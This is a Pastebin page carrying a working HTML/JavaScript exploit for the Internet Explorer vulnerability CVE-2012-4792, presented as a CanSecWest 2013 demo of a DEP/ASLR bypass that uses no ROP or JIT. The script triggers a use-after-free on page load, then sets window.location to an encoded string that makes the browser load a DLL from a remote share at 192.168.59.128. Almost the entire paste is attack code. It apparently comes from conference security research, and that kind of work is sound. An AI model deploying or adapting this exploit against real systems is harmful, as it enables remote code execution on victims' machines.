API tools faq
paste
Guest User

CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT"

a guest
Mar 17th, 2013
2,840
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.06 KB | None | 0 0
raw download clone embed print report
  1. <!doctype html>
  2. <html>
  3. <head>
  4. <script>
  5. // CVE-2012-4792 demo of "DEP/ASLR bypass without ROP/JIT" in CanSecWest 2013
  6. // Effective in 32-bit IE on x64 Windows
  7. // Will load \\192.168.59.128\x\x.dll
  8. // https://twitter.com/tombkeeper
  9. function GIFT() {
  10.     var e0 = null;
  11.     var e1 = null;
  12.     var e2 = null;
  13.  
  14.     try {
  15.         e0 = document.getElementById("a");
  16.         e1 = document.getElementById("b");
  17.         e2 = document.createElement("q");
  18.         e1.applyElement(e2);
  19.         e1.appendChild(document.createElement('button'));
  20.         e1.applyElement(e0);
  21.         e2.outerText = "";
  22.         e2.appendChild(document.createElement('body'));
  23.     } catch(e) { }
  24.     CollectGarbage();
  25.     window.location = "\u0274\u7ffe\u4242\u4242\u0014\u0030\u0044" +
  26.     "\u0012\u1212\u0004\u005c\u005c\u0031\u0039\u0032\u002e\u0031" +
  27.     "\u0036\u0038\u002e\u0035\u0039\u002e\u0031\u0032\u0038\u005c" +
  28.     "\u0078\u005c\u0078\u002e\u0064\u006c\u006c\u006e\u0074\u0064" +
  29.     "\u006c\u006c\u002e\u0064\u006c\u006c";
  30. }
  31.  
  32. </script>
  33. </head>
  34. <body onload="eval(GIFT())">
  35.     <form id="a">
  36.     </form>
  37.     <dfn id="b">
  38.     </dfn>
  39. </body>
  40. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!